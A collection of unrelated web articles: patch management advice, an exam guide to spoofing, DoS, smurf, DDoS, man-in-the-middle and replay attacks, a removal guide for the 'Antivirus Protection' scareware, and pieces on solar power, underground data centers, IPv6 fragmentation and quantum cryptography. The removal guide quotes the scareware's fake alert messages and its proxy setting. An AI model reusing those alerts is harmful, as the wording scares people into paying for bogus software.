By taking an enterprise-wide approach to security assessment, companies need to evaluate internal patch management processes, understanding the potential risk to network systems and data and ultimately adopting a proactive approach to patch management. New tools are available to help companies of all sizes eliminate many of the manual aspects of security patch management, allowing IT professionals to automate time-consuming aspects of patch management, while also accessing key features designed to help workers better understand, test, deploy and validate the right patches, in the amount of time required.
The most effective patch management software should provide a straightforward approach to patch scanning and remediation, ensuring accurate, secure processes that can protect every computer within the enterprise. Important features to look for include: automatic or scheduled installation of missing patches, the ability to rollback or uninstall patches, knowledge about the patches including the vulnerability severity and links to third party information about the issue, and summary reports for executive reporting.
A good patch management software package should also include a shared back-end database to facilitate collaboration and patch management tracking to compare progress against existing enterprise-security initiatives. Such features are important because the first step in the patch process often requires wading through ad-hoc releases, service packs and temporary fixes, to determine what patches are applicable to the enterprise.
After needed patches are identified, a relatively easy set of steps helps ensure that the patch process benefits the enterprise, and doesn’t cause more harm than good:
1. Patch Testing – Once a patch is identified, it must be tested to evaluate the potential impact on a particular computing environment. Installing the patches to a control group and subjecting them to normal use prior to deployment is one option.
2. Scan and Assess – Because computing environments are complex and dynamic, simply knowing that a patch is likely needed somewhere in the enterprise provides little conclusive evidence as to exactly where holes still remain. To identify such holes, systems need to be scanned and assessed, identifying all systems that require patches while accepting systems that need to be left alone.
3. Remediate – Remediation, which involves applying patches to systems in need, is usually the most time-intensive part of the patch management process. However, it is also the most crucial step for protecting the enterprise.
4. Validate and Report – To verify patches have been properly installed, IT managers need to validate and report on key systems and applications. This step provides final assurance that the patch process is complete.
The bottom line
Return on investment (ROI) is a mantra in business, and for good reason – companies want to know that the technology investments they make today will protect them from losses in the future. Based on extensive research and real-world examples, automated patch management can provide a clear ROI because it results in significant productivity gains for end users and administrators alike. Specifically, such systems help improve productivity in two key areas:
– automating the manual process of patching systems and solutions, and
– reducing the number of successful attacks against identified vulnerabilities.
Each step in the patch management process expends resources, but automating the process significantly reduces the total hours required for managing the process to completion. Patch management systems can dramatically improve performance for IT administrators responsible for patching systems, moving the patch management process from a manual, ad-hoc series of steps to an automated system that installs key structures and processes designed to achieve significant time and cost gains.
The most important benefit of a patch management system may lie in its ability to reduce risk. Successfully patched computer systems can eliminate known vulnerabilities and therefore reduce the instances and impact of attacks – preventing the ensuing loss of data, privacy and reputation often experienced by companies suffering an attack. Using automated patch management as a proactive security measure actually not only reduces the total number of successful attacks against systems, but also reduces the propagation of attacks.
Risk reduction protects against qualitative losses to reputation, legal action and competition. Such benefits can be even more significant to an organization than the baseline time and costs savings achieved through improvements to the overall patch management process. Although lost productivity of end-users is quantifiable, it’s usually not something that can be recovered directly. Giving employees, contractors and business partners the ability to conduct business without disruption can be a significant benefit to companies.
Ensuring network security through automated patch management is no simple task. It requires diligence to stay informed and secure. However, companies that understand risk and proactive security will find that the investments made in an automated patch management process far outweigh the costs. | <urn:uuid:611c9653-5370-4e1c-86c0-26094480fd5f> | CC-MAIN-2017-04 | https://www.helpnetsecurity.com/2006/04/28/automated-patch-management/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284429.99/warc/CC-MAIN-20170116095124-00348-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.935918 | 1,548 | 2.625 | 3 |
Picture This: A Visual Guide to Disruptive Attacks
An attack on your systems that is intended to be disruptive to legitimate service can take many forms, and the terms used to define such attacks can be confusing on a certification exam. In the real world, you know that your servers are responding to a lot of requests that they should not be getting, and that this is bringing your performance to a crawl. So you start taking action to put a stop to it right away.
In the exam world, you have to approach it somewhat differently: you need to pick up on a few clues here and there and be able to determine whether it is a spoofing attack or a smurfing attack, and then pick the right multiple-choice answer.
This guide looks at some of the more common disruptive attack types and consists of a subset of those you need to know to earn CompTIA’s Security+ designation (both on the current SY0-301 exam and the next version of the test that is currently slated for release in the second quarter of 2014).
To illustrate the differences between them, the analogy used throughout is that of a student just trying to make it through class and participate the same as all other students. The attacks that are occurring, exaggerated a bit for emphasis, disrupt our hypothetical student’s ability to continue to concentrate and participate as he normally would.
Spoofing, quite simply, can be described as faking. The person doing the spoofing is trying to make it look as if it is another party taking the action. Always think of spoofing as fooling. Attackers are trying to fool the user, fool the system, and/or fool the host into believing they’re something they aren’t. Because the word spoof can describe any false information at any level, spoofing can occur at any level of a network.
Figure One: With spoofing, the attacker attempts to make it look as if it is another who is interacting with you. In this case, the hands do not belong to the person it is thought they are associated with. Note that others may be able to see what is transpiring, but that does not protect you.
Some of the most common spoofing attacks use e-mail source addresses, packet source addresses, and system MAC addresses to make it look as if another party is involved. Network traffic filters and e-mail filters should be configured to check for source spoofing in network packets and emails.
It should make sense that if a packet or message is leaving your LAN, then it cannot have a valid source address from the Internet AND if the packet is entering your LAN, then it cannot have a valid source address from the LAN. Filters of this type are called egress (exiting) and ingress (entering) filters and they should be configured on every border system.
Many have come to rely on a caller ID display to inform them of who is calling and serve as a simple form of authentication. There are several programs available, however, that allow a miscreant to send fake values for both the phone number and the name display to a caller ID box. This is known as caller ID spoofing and, when coupled with other forms of social engineering, can help convince an insider that they are talking to someone trusted when the opposite is true
Denial of Service (DoS)
With a denial of service (DoS) attack, you’ve attracted the interest of someone who is now focused on attempting to disrupt your ability to interact normally. If they can keep you busy responding to illegitimate requests, they can prevent you from functioning normally.
Figure Two: A DoS attack tries to tie up all of your attention and prevent you from functioning normally.
By preventing authorized users from having access to your services, attackers can cause you great harm. Most DoS attacks come as either the exploitation of a flaw, or from excess traffic. While you can curtail the exploitation of flaws by keeping patches and updates current (as well as by using firewalls), traffic-based attacks require detection and network traffic filtering.
With the right tools, you can stop the attack from getting in your network, but you also need to stop it from upstream as well or else communication to and from your network will be slowed by the bogus attack traffic and you will be unable to support legitimate communications. Stopping the upstream traffic can mean getting help from your ISP.
Two of the most common types of DoS attacks are the ping of death and the buffer overflow. The ping of death crashes a system by sending Internet Control Message Protocol (ICMP) packets (think echoes) that are larger than the system can handle. Buffer overflow attacks, as the name implies, attempt to put more data (usually long input strings) into the buffer than it can hold.
The best way to think of smurfing is to imagine that the person wanting to conduct a DoS attack against you doesn’t have enough clout to slow you down and so they solicit help doing so from another party — sometimes without that party’s knowledge. The key to identifying a smurf attack is that another party, larger than the initiating party, is employed to harm the target system.
Figure Three: With a smurfing attack, another party that is larger is brought in to help damage your ability to interact normally.
As an example, suppose the attacker uses IP spoofing and broadcasts a ping request to a group of hosts in a network. The ICMP ping request (type 8) would be answered with an ICMP ping reply (type 0) if the targeted system is up (otherwise an unreachable message is returned). If the broadcast were to be sent to the network, all of the hosts could answer the ping and the result could be an overload of the network and the target system. In this case, rather than depending on the traffic from just one system to be able to bring the target down, the traffic of the network was employed to do the task.
The primary method of eliminating smurf attacks involves prohibiting ICMP traffic through a router. If the router blocks ICMP traffic, smurf attacks from an external attacker aren’t possible.
Distributed Denial of Service (DDoS)
A distributed denial-of-service (DDoS) attack is similar to a DoS attack except that more attack points are involved. A DDoS attack amplifies the concepts of a DoS attack by using multiple computer systems (often through botnets) to conduct the attack against a single organization.
Figure Four: With DDoS attacks, numerous entities are brought in to disrupt the normal operations of the target.
An attacker can load an attack program onto dozens or even hundreds of computer systems and have them all pointed at the same target. It is possible for the attack program to lie dormant on these computers until they get an attack signal from a master computer which then notifies them to launch an attack simultaneously on the target network or system.
The systems taking direction from the master control computer are referred to as zombies or nodes. These systems merely carry out the instruction they’ve been given by the master computer. In the past, DDoS attacks have hit large companies such as Amazon, Microsoft, and AT&T and they are often widely publicized in the media.
Man in the Middle and Replay Attacks
A man in the middle attack is also often referred to as session hijacking, for that is what transpires. An entity for whom the message (data/packet/etc.) is not intended gathers the data for some illicit purpose.
Figure Five: With a man in the middle attack, a third party gathers data about the session that they should not be privy to.
Quite often, the method used in these attacks clandestinely places a piece of software between a server and the user that neither the server administrators nor the user are aware of. The intercepted data can be used as the starting point for a modification attack that the server responds to, thinking it’s communicating with the legitimate client. The attacking software continues sending on information to the server, and so forth.
For exams, know that a man in the middle attack is an active attack. Something is actively intercepting the data and may or may not be altering it. If it’s altering the data, the altered data masquerades as legitimate data traveling between the two hosts. In recent years, the threat of man-in-the-middle attacks on wireless networks has increased. A malicious rogue can be outside the building intercepting packets, altering them, and sending them on.
A common solution to this problem is to enforce a secure wireless authentication protocol such as WPA2. IF the intercepted data is sent again, then it qualifies as a replay attack. All that differs between man in the middle and replay attacks is that in the latter intercepted data is sent again (replayed).
Figure Six: With a replay attack, the same data that was intercepted can be sent to you again by a third party that leads you to believe it is still coming from the first party.
This type of attack can occur with security certificates from systems such as Kerberos: The attacker resubmits the certificate, hoping to be validated by the authentication system and circumvent any time sensitivity. If this attack is successful, the attacker will have all the rights and privileges from the original certificate. This is the primary reason that most certificates contain a unique session identifier and a time stamp. If the certificate has expired, it will be rejected and an entry should be made in a security log to notify system administrators.
Man in the middle and replay attacks can be thwarted by complex packet sequencing rules, time stamps in session packets, periodic mid-session reauthentication, mutual authentication, the use of encrypted communication protocols, and spoof-proof authentication mechanisms.
Summing it up
For certification study, know that all of these attacks are similar and there can be overlap between them. Spoofing is often used in conjunction with other attacks, but merely involves one party pretending to be another. DoS attacks, whether spoofed or not, involve trying to disrupt your services by keeping them so busy responding to non-legitimate requests that they cannot effectively contend with the legitimate requests.
If the attacker brings in another — larger — party to act on their behalf, it is known as smurfing. If the DoS attacker brings in lots of other parties to overwhelm you, then it is known as DDoS. A man in the middle attack intercepts data that intended to only be between the sender and receiver. If the man in the middle resends the data — with or without altering it — then it becomes a replay attack. | <urn:uuid:fea89906-0652-4cf5-a668-4282f7176a15> | CC-MAIN-2017-04 | http://certmag.com/picture-this-a-visual-guide-to-disruptive-attacks/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280900.71/warc/CC-MAIN-20170116095120-00468-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.953035 | 2,193 | 3.1875 | 3 |
Antivirus Protection is a rogue anti-spyware program from the same family as Antivirus Soft and AV Security Suite. This family of rogues is installed through the use of malware and exploit kits that download and install Antivirus Protection onto your computer without your permission. When this program is installed it will be configured to start automatically when Windows starts, and once started, will perform a scan of your computer and state that it has found numerous infections. It will not, though, tell you the files that are supposedly infected and will also state that you cannot remove anything until you first purchase the program. This is a complete scam, as the program is scripted to display infections every time it is run. That means if you reinstalled Windows and ran Antivirus Protection it would still say that you are infected. It does this to scare you into thinking that your computer has a security problem so that you will then purchase the program. When you purchase the program, though, all you do is waste your money as the program has no useful function for your computer.
When Antivirus Protection is running it will state that most programs are infected when you attempt to run them. The text of this fake infection alert is:
Application can't be started. The file notepad.exe is damaged. Do you want to active your antivirus software now?
It does this for two reasons. The first is to make you think that your legitimate, and clean, programs are infected so that you will then purchase the rogue. The second reason is to block you from running any legitimate security programs that may help you remove this infection.
While Antivirus Protection is running it will also show you fake security alerts that attempt to further scare you into thinking you have a infection on your computer. These alerts will state that active malware has been detected or that your computer is under attack. The text of these alerts is:
Windows Security Alert
Windows reports that computer is infected. Antivirus software helps to protect your computer against viruses and other security threats. Click here for the scan your computer. Your system might be at risk now.
Antivirus Software Alert
Your computer is being attacked by an internet virus. It could be a password-stealing attack, a trojan - dropper or similar.
Just like the other false infections alerts, these warnings are all fake and should be ignored. Last, but not least, Antivirus Protection will also configure your computer to use a proxy server at 127.0.0.1:47392, which is actually the Antivirus Protection program itself. This makes it that when you browse the web using Internet Explorer, the rogue will intercept all your web browser requests and instead display a page that shows a security warning about the site you are visiting. This warning states:
Internet Explorer warning - visiting this site may harm your computer!
Most likely causes:
- The website contains exploits that can launch a malicious code on your computer
- Suspicious network activity
- There might be an active spyware running on your computer
These warnings should be ignored as they are false. If you use a browser other than Internet Explorer you will not see the warnings at all and can browse the Internet like normal.
Without a doubt, Antivirus Protection Trial was created solely to trick you into purchasing the program by convincing you that your computer has a security problem. Now that you know what this program does, it goes without saying that you should not purchase this program for any reason. If you already have purchased it, then we suggest you contact your credit card company and dispute the charges. To remove Antivirus Protection and any related malware, please follow the steps in the removal guide below.
Self Help Guide
- Print out these instructions as we may need to close every window that is
open later in the fix.
- Reboot your computer into Safe Mode with Networking. To
do this, turn your computer off and then back on and immediately when you
see anything on the screen, start tapping the F8 key on your
keyboard. Eventually you will be brought to a menu similar to the one below:
Using the arrow keys on your keyboard, select Safe Mode with Networking and press Enter on your keyboard. If you are having trouble entering safe mode, then please use the following tutorial: How to start Windows in Safe Mode
Windows will now boot into safe mode with networking and prompt you to login as a user. Please login as the same user you were previously logged in with in the normal Windows mode. Then proceed with the rest of the steps.
- It is possible that the infection you are trying to remove will not allow
you to download files on the infected computer. If this is the case, then
you will need to download the files requested in this guide on another computer
and then transfer them to the infected computer. You can transfer the files
via a CD/DVD, external drive, or USB flash drive.
- Before we can do anything we must first end the processes that belong to
so that it does not interfere with the cleaning procedure. To do this, please
download RKill to your desktop from the following link.
RKill Download Link - (Download page will open in a new tab or browser window.)
When at the download page, click on the Download Now button labeled iExplore.exe download link. When you are prompted where to save it, please save it on your desktop.
- Once it is downloaded, double-click on the iExplore.exe
icon in order to automatically attempt to stop any processes associated with
and other Rogue programs. Please be patient while the program looks for various
malware programs and ends them. When it has finished, the black window will
automatically close and you can continue with the next step. If you get a
message that RKill is an infection, do not be concerned. This message is just
a fake warning given by
when it terminates programs that may potentially remove it. If you run into
these infections warnings that close RKill, a trick is to leave the warning
on the screen and then run RKill again. By not closing the warning, this typically
will allow you to bypass the malware trying to protect itself so that RKill
. So, please try running RKill until the malware is no longer running. You
will then be able to proceed with the rest of the guide. Do not reboot
your computer after running RKill as the malware programs will start again.
If you continue having problems running RKill, you can download the other renamed versions of RKill from the RKill download page. Both of these files are renamed copies of RKill, which you can try instead. Please note that the download page will open in a new browser window or tab.
- At this point you should download Malwarebytes Anti-Malware, or MBAM, to scan your computer for any any infections or adware that may be present. Please download Malwarebytes from the following
location and save it to your desktop:
Malwarebytes Anti-Malware Download Link (Download page will open in a new window)
- Once downloaded, close all programs and Windows on your computer, including
- Double-click on the icon on your desktop named mb3-setup-1878.1878-22.214.171.1249.exe.
This will start the installation of MBAM onto your computer.
- When the installation begins, keep following the prompts in order to continue
with the installation process. Do not make any changes to default settings
and when the program has finished installing, make sure you leave Launch
Malwarebytes Anti-Malware checked. Then click on the Finish button. If MalwareBytes prompts you to reboot, please do not do so.
- MBAM will now start and you will be at the main screen as shown below.
Please click on the Scan Now button to start the scan. If there is an update available for Malwarebytes it will automatically download and install it before performing the scan.
- MBAM will now start scanning your computer for malware. This process can
take quite a while, so we suggest you do something else and periodically
check on the status of the scan to see when it is finished.
- When MBAM is finished scanning it will display a screen that displays any malware that it has detected. Please note that the infections found may be different
than what is shown in the image below due to the guide being updated for newer versions of MBAM.
You should now click on the Remove Selected button to remove all the seleted malware. MBAM will now delete all of the files and registry keys and add them to the programs quarantine. When removing the files, MBAM may require a reboot in order to remove some of them. If it displays a message stating that it needs to reboot, please allow it to do so. Once your computer has rebooted, and you are logged in, please continue with the rest of the steps.
- You can now exit the MBAM program. If Malwarebytes did not prompt you to reboot your computer, please do so that you are back in normal mode.
- As many rogues and other malware are installed through vulnerabilities found
in out-dated and insecure programs, it is strongly suggested that you use
Secunia PSI to scan for vulnerable programs on your computer. A tutorial on
how to use Secunia PSI to scan for vulnerable programs can be found here:
How to detect vulnerable and out-dated programs using Secunia Personal Software Inspector
Your computer should now be free of the Antivirus Protection Trial program. If your current anti-virus solution let this infection through, you may want to consider purchasing the PRO version of Malwarebytes Anti-Malware to protect against these types of threats in the future. | <urn:uuid:008e8718-48aa-4bd4-9c6b-91bc7b56988d> | CC-MAIN-2017-04 | https://www.bleepingcomputer.com/virus-removal/remove-antivirus-protection | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280242.65/warc/CC-MAIN-20170116095120-00543-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.910151 | 2,031 | 2.59375 | 3 |
The US Department of Energy today said it was conditionally committing $2 billion to develop two concentrating solar power projects that it says will offer 500 megawatts of power combined, effectively doubling the nation's currently installed capacity of that type of power.
Concentrated solar systems typically use parabolic mirrors to collect solar energy. Other methods include system such as a power tower that uses directed mirrors to concentrate the sun's rays onto a solar receiver at the top of a tall tower. Google in fact recently invested $168 million in such a system.
More on energy projects: 10 hot energy projects that could electrify the world
The new projects are both located in California: the Mojave Solar Project (MSP) in San Bernardino County and the Genesis Solar Project in Riverside County. The projects will both sell power to Pacific Gas and Electric.
According to the DOE, when operational, the 250MW Mojave Solar Project will avoid over 350,000 metric tons of carbon dioxide annually and is anticipated to generate enough electricity to power over 53,000 homes.
The site will be the first US utility-scale deployment of the project's vendor, Abengoa Solar's Solar Collector Assembly (SCA). The SCA's features include a lighter, stronger frame designed to hold parabolic mirrors that are less expensive to build and install. The SCA heat collection element uses an advanced receiver tube to increase thermal efficiency by up to 30% percent compared to the nation's first CSP plants, the DOE states. In addition, the advanced mirror technology will improve reflectivity and accuracy. Together, these improvements can permit the collection of the same amount of solar energy from a smaller solar field. Unlike older CSP plants, the Mojave system will operate without fossil fuel back-up systems for generation during low solar resource periods, according to the DOE.
The 250MW Genesis Solar Project meanwhile, will feature scalable parabolic trough solar thermal technology that has been used commercially for more than two decades. The project is expected to avoid over 320,000 metric tons of carbon dioxide emissions annually and produce enough electricity to power over 48,000 homes, the DOE stated. NextEra Energy in the primary vendor on the project.
Follow Michael Cooney on Twitter: nwwlayer8
Layer 8 Extra
Check out these other hot stories: | <urn:uuid:8fd93161-6fdc-46ae-844f-02e164af5ae6> | CC-MAIN-2017-04 | http://www.networkworld.com/article/2229487/infrastructure-management/energy-dept--spends--2b-to-double-us-concentrated-solar-power-capacity.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284376.37/warc/CC-MAIN-20170116095124-00083-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.916591 | 467 | 3.078125 | 3 |
More data centers are making their way underground. Colocation and data center providers such as Iron Mountain, Cavern Technologies and InfoBunker are already operating underground data centers, taking advantage of natural cooling and protection from the elements. However, are underground data centers a coming trend or a novelty? Is it time for data center providers to dig in and start putting their servers and computing hardware underground? What options should solution providers recommend to customers?
First, let’s consider the changes in operational costs for today’s data centers. The greatest costs of data center operations remain those of cooling and the power associated with cooling. Operating chillers to provide a consistently cool operating temperature remains one of the biggest line items in the data center operating budget. An IDC survey of 404 enterprise data center managers (each with at least 1,000 square feet and 100 servers) reports that power and cooling costs, along with IT infrastructure costs, each make up about 24 percent of the operating budget.
So how does moving underground affect operating costs and efficiencies? Let’s assess some of the variables.
It’s Cool to Be Underground
The primary reason to migrate data centers underground is natural cooling. Rather than powering up chillers to maintain a cool operating temperature 24/7, underground facilities maintain a naturally cooler, unchanging ambient temperature. Cavern Technologies, for example, says that its underground facility in Lenexa, Kansas, which is built in an abandoned limestone mine, maintains a consistently cool operating temperature of 68 degrees.
The operational challenge for any underground data center is bleeding off the excess heat. Underground facilities have air conditioning for comfort, but excess heat from the servers usually has to be vented through holes drilled to the exterior. The Underground, an Iron Mountain facility in a repurposed limestone mine in Pennsylvania, maintains a constant temperature of 55 degrees, and Iron Mountain executives say that the limestone walls of the mine act as a heat sink, absorbing up to 1.5 BTUs per hour per square foot. Most underground facilities, however, need some kind of heat management strategy.
Location, Location, Location
Then, of course, there are power considerations. Even if you don’t need a lot of energy to power chillers, you still need reliable power to run the equipment. This is where things can become expensive.
Rather than digging out an underground data center, most companies use natural or preexisting underground locations, such as abandoned military bunkers, mines or caverns. Most of these preexisting underground locations are in isolated areas, where power may not be available. Because you can’t “bring the mountain to Mohammed,” you have to bring a reliable power source to the data center, which drives construction costs up.
You have the same issues regarding reliable network connections. Because underground data centers tend to be remote, you also have to bring in fiber and high-speed networking to provide connectivity. One of the reasons to go underground is to eliminate weather as a risk factor, so to minimize climate risk, you should put cable underground as well, which will increase construction and maintenance costs.
When considering an underground data center location, you need to balance the cost savings from construction (you already have a hole in the ground) with the cost of power and connectivity. You may be saving on the cost of chillers while increasing the cost of delivering power and infrastructure access.
Is It Worth It?
There are some real advantages to taking a data center underground, but there are other considerations beyond cooling and power that could present obstacles. What about personnel? Is the underground data center in a location where you can attract skilled IT professionals to maintain the facility? What about external support systems? You won’t be able to install everything underground, so you want to be able to accommodate generators, climate control systems and other units housed outside the facility. All of these factors could add to overall construction and operating costs.
There also are new technologies and strategies that are solving the same problems that underground data centers solve, specifically cooling and power, but at much lower costs. Most of these cooling techniques can be retrofitted into existing data centers.
Hot-aisle and cold-aisle strategies, for example, have been around for some time and use airflow to facilitate cooling while reducing costs. Some estimate that savings in cooling costs from hot-aisle containment can be as high as 43 percent, without having to build a new data center. Hot-aisle designs have become more sophisticated and less expensive, making them a viable alternative for saving on operating costs.
Water-based data center cooling is another strategy that is gaining popularity. Water has 50 to 1,000 times the capacity of air to remove ambient heat, which makes it more efficient for equipment cooling. So, rather than building data centers underground, others are experimenting with underwater data centers and floating data centers. A less radical approach is using water-cooled racks for high-density computing, which can be easily installed in an existing data center.
While data centers may be ready to move underground, do you really need to? There are alternative cooling technologies available today that resellers can offer to customers to retrofit into their existing data centers. Cold-aisle and water-based cooling strategies are more effective and reduce energy costs, and you don’t have to move the operation to a bunker or a cave. | <urn:uuid:2d759c57-2853-4b05-8fa7-032d40790549> | CC-MAIN-2017-04 | http://www.ingrammicroadvisor.com/data-center/is-it-finally-time-to-build-an-underground-data-center | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279489.14/warc/CC-MAIN-20170116095119-00479-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.933245 | 1,097 | 2.53125 | 3 |
Fragmentation has been a frequent source of security vulnerabilities in IPv4, and for good reason. With fragmented IPv4 packets, the layer 4 header information is not available in the second through the last fragment. The process of fragmentation and fragment reassembly can create unexpected and harmful behaviors in intermediate nodes (such as firewalls and routers) and end nodes (such as user computers). In this blog, I will discuss how fragmentation is implemented in IPv6 and how it varies from IPv4 fragmentation.
If there is one myth about IPv6 that otherwise clueful engineers have clung to, it is the misconception that packets cannot be fragmented in IPv6. This is only partially true. Intermediate devices, such as routers and firewalls, cannot fragment a packet, but the source node can fragment packets. As such, end nodes and intermediate nodes must know how to properly handle fragmented packets.
There are two primary concerns when a packet is fragmented in IPv6. First, fragmentation requires the use of the fragmentation extension header. As such, the byte offset in the packet for the layer 4 header will be shifted 8 bytes because of the fragmentation extension header and nodes must know how to locate the layer 4 header. Second, like IPv4, only one fragment will contain the layer 4 header (the layer 4 header is typically the first packet although there are scenarios where the layer 4 header could appear in the second fragment). The remaining fragments of the packet will not contain the layer 4 header and the intermediate device must either correlate the layer 4 information from the fragment that does contain the layer 4 header with other fragments or forward the fragments without knowledge of the layer 4 information for the assembled packet that the fragment is associated with.
Unlike IPv4, because intermediate nodes cannot fragment IPv6 fragments, it is essential that the source node either send a packet that is the same as or smaller than the maximum transmission unit (MTU) size for the network path or break packets into fragments that are the same size or smaller than the MTU size for the path.
Path MTU Discovery (PMTUD) is nice to have in IPv4(1), but PMTUD is crucial in IPv6(2). When an intermediate node receives a packet that is too big for the MTU of the forwarding path, the intermediate mode must drop the packet and send an ICMPv6 “packet too big” back to the source node. Since an intermediate node cannot fragment an IPv6 packet; it is critical that intermediate nodes allow the “packet too big” messages from other intermediate nodes to be forwarded. If the node sourcing the large packets does not receive the “packet too big” message, there is a considerable risk that the source node will continue to transmit packets that will be dropped before they reach their destination. IETF RFC 4890 provides additional details on ICMPv6 filtering recommendations(3).
If the source node does not perform PMTU discovery, it must send packets no larger than the minimum IPv6 MTU size of 1,280 bytes. Some Internet-based services eliminate PMTU discovery problems by sourcing IPv6 packets with an MTU of 1,280 bytes(4). At the cost of not being able to transit larger packets, sending IPv6 packets no larger than 1,280 bytes ensures that the packet will not be dropped because it is too large to be transited across a network path and the source does not need to rely upon a “packet-too-big” ICMPv6 message. The approach of setting the MTU to 1,280 bytes by default is safe, but, as found during World IPv6 Day, is also controversial(5).
Fragmentation in IPv6 neighbor discovery has also caused some concern recently because of its potential use as an evasion technique for RA-Guard(6). A solution that has been proposed is elimination of all extension headers in neighbor discovery packets(7).
(1) IETF RFC 1191, “Path MTU Discovery,” Mogel, J and Deering, S, November 1990.
(2) IETF RFC 1981, “Path MTU Discovery for IPv6” Macann, J, Deering, S and Mogel, J, August 1996.
(3) IETF RFC 4890, “Recommendations for Filtering ICMPv6 Messages in Firewalls,” Davies, E and Mohacsi, J, May 2007.
(4) IETF RFC 2460, “Internet Protocol, Version 6 (IPv6) Specification,” Deering, S and Hinden, R, December 1998.
(5) See discussion on the IPv6 operations e-mail list: http://lists.cluenet.de/pipermail/ipv6-ops/2011-June/005755.html
(6) Internet-Draft, “IPv6 Router Advertisement Guard (RA-Guard) Evasion,” Gont, F, May 31, 2011, http://tools.ietf.org/id/draft-gont-v6ops-ra-guard-evasion-00.txt
(7) Internet-Draft, “Security Implications of the Use of IPv6 Extension Headers with IPv6 Neighbor Discovery,” Gont, F, May 31, 2011, http://tools.ietf.org/id/draft-gont-6man-nd-extension-headers-00.txt | <urn:uuid:1e6213a5-7831-4e73-aeea-02e6c4a58cf3> | CC-MAIN-2017-04 | https://www.arbornetworks.com/blog/asert/ipv6-fragmentation/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279489.14/warc/CC-MAIN-20170116095119-00479-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.855328 | 1,133 | 3.21875 | 3 |
Behavior of different cover crops in a network of on-farm trials [Verhalten verschiedener Zwischenkulturen in einem Netzwerk von on-farm-versuchen] [Comportamento di diverse colture intermedie in una rete di esperimenti on-farm]
Amosse C.,Institute For Pflanzenbauwissenschaften Ipb |
Dugon J.,AGRIDEA |
Chassot A.,AGRIDEA |
Courtois N.,AgriGeneve |
And 11 more authors.
Agrarforschung Schweiz | Year: 2015
A network of experimental fields in northern and western Switzerland was used to better understand the behavior of various cover crops in diversified environmental conditions. Several species were oriented towards soil cover in autumn (e.g. brown mustard). Others produced an important aerial biomass (e.g. sunflower). Some, with intermediate performance during autumn, had a good soil cover at the end of winter, as black oat for example. Multifactorial analysis allowed us to precise the relationship between cover crops performance and environmental and agronomical constraints. We identified positive correlations between soil covering in autumn and the sum of precipitations 10 days before sowing or intermediate tillage before cover crop sowing. Aerial biomass of cover crops at the time of the first frost was correlated with soil texture: lighter soils were more suitable for high aerial development. No species combined all the advantages expected from cover crops all along the fallow period but species mixtures offer the best opportunities. © 2015 A M T R A - Association pour la Mise en Valeur des Travaux de la Recherche Agronomique. All rights reserved. Source | <urn:uuid:723979dc-09ee-4558-bb82-b7579d75d71b> | CC-MAIN-2017-04 | https://www.linknovate.com/affiliation/fondation-rurale-interjurassienne-297817/all/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280888.62/warc/CC-MAIN-20170116095120-00203-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.862445 | 372 | 2.59375 | 3 |
7.18 What is quantum cryptography?
Quantum cryptography [BBB92] [Bra93] is a method for secure key exchange over an insecure channel based on the nature of photons. Photons have a polarization, which can be measured in any basis, where a basis consists of two directions orthogonal to each other, as shown in Figure 7.1.
If a photon's polarization is read in the same basis twice, the polarization will be read correctly and will remain unchanged. If it is read in two different bases, a random answer will be obtained in the second basis, and the polarization in the initial basis will be changed randomly, as shown in Figure 7.2.
The following protocol can be used by Alice and Bob to exchange secret keys.
- Alice sends Bob a stream of photons, each with a random polarization, in a random basis. She records the polarizations.
- Bob measures each photon in a randomly chosen basis and records the results.
- Bob announces, over an authenticated but not necessarily private channel (for example, by telephone), which basis he used for each photon.
- Alice tells him which choices of bases are correct.
- The shared secret key consists of the polarization readings in the correctly chosen bases.
Quantum cryptography has a special defense against eavesdropping: If an enemy measures the photons during transmission, he will use the wrong basis half the time, and thus will change some of the polarizations. That will result in Alice and Bob having different values for their secret keys. As a check, they can exchange some random bits of their key using an authenticated channel. They will therefore detect the presence of eavesdropping, and can start the protocol over.
There has been experimental work in developing such systems by IBM and British Telecom. For information on quantum computing (which is not the same as quantum cryptography), see Question 7.17.
- 7.1 What is probabilistic encryption?
- Contribution Agreements: Draft 1
- Contribution Agreements: Draft 2
- 7.2 What are special signature schemes?
- 7.3 What is a blind signature scheme?
- Contribution Agreements: Draft 3
- Contribution Agreements: Final
- 7.4 What is a designated confirmer signature?
- 7.5 What is a fail-stop signature scheme?
- 7.6 What is a group signature?
- 7.7 What is a one-time signature scheme?
- 7.8 What is an undeniable signature scheme?
- 7.9 What are on-line/off-line signatures?
- 7.10 What is OAEP?
- 7.11 What is digital timestamping?
- 7.12 What is key recovery?
- 7.13 What are LEAFs?
- 7.14 What is PSS/PSS-R?
- 7.15 What are covert channels?
- 7.16 What are proactive security techniques?
- 7.17 What is quantum computing?
- 7.18 What is quantum cryptography?
- 7.19 What is DNA computing?
- 7.20 What are biometric techniques?
- 7.21 What is tamper-resistant hardware?
- 7.22 How are hardware devices made tamper-resistant? | <urn:uuid:e14b5170-e379-4f99-a867-1a00da3ff926> | CC-MAIN-2017-04 | https://www.emc.com/emc-plus/rsa-labs/standards-initiatives/what-is-quantum-cryptography.htm | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284405.58/warc/CC-MAIN-20170116095124-00505-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.915026 | 682 | 3.59375 | 4 |
As a technology company, Gradwell is fascinated by the digital world and how telecommunications have progressed since the development and adoption of computers. Experts argue that the very first digital communication goes as far back as the telegraph system at least a century before the internet we all know and love. It’s also fairly obvious that computer science has rapidly developed internet technology since the first packet-switching papers in the 1960s, but we could be here all day talking about that period in history. The core of what drives it all goes as far back as 1679 when historians suggest Gottfried Leibniz identified the binary number system, which is the basis for binary code. And we all know the base of computer data is binary (well, there are some translators and other bits involved).
